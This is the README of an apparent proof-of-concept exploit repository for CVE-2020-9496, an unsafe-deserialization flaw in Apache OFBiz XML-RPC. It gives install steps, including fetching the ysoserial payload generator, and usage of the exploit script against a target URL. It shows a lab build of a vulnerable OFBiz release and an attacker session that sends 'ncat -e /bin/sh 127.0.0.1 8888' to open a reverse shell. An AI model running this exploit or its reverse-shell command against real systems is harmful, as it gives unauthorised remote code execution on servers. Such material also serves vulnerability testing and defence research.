XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03# CVE-2020-9496
XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
## Install requirements
```
$ pip install -r requirements.txt
$ wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial.jar
```
## Usage
```
$ python cve-2020-9496.py --target [URL]
```
## Test
victim
```
$ git clone https://gitbox.apache.org/repos/asf/ofbiz-framework.git ofbiz-framework
$ cd ofbiz-framework/
$ git checkout release17.12.01
$ sed -i 's/gradle-3.2.1-bin.zip/gradle-6.0-bin.zip/g' gradle/wrapper/gradle-wrapper.properties
$ sudo ./gradlew ofbiz
```
attacker
```
$ python cve-2020-9496.py --target https://127.0.0.1:8443
cmd> ncat -e /bin/sh 127.0.0.1 8888
[!] Send payload ...
[+] Done!
```
PoC

### Thanks to: https://github.com/g33xter
[4.0K] /data/pocs/fbd305221cf0ee9f7d7f4ac3a1b7ee5bd36a6df9
├── [1.4K] cve-2020-9496.py
├── [1.0K] LICENSE
├── [159K] poc.png
├── [ 873] README.md
└── [ 91] requirements.txt
0 directories, 5 files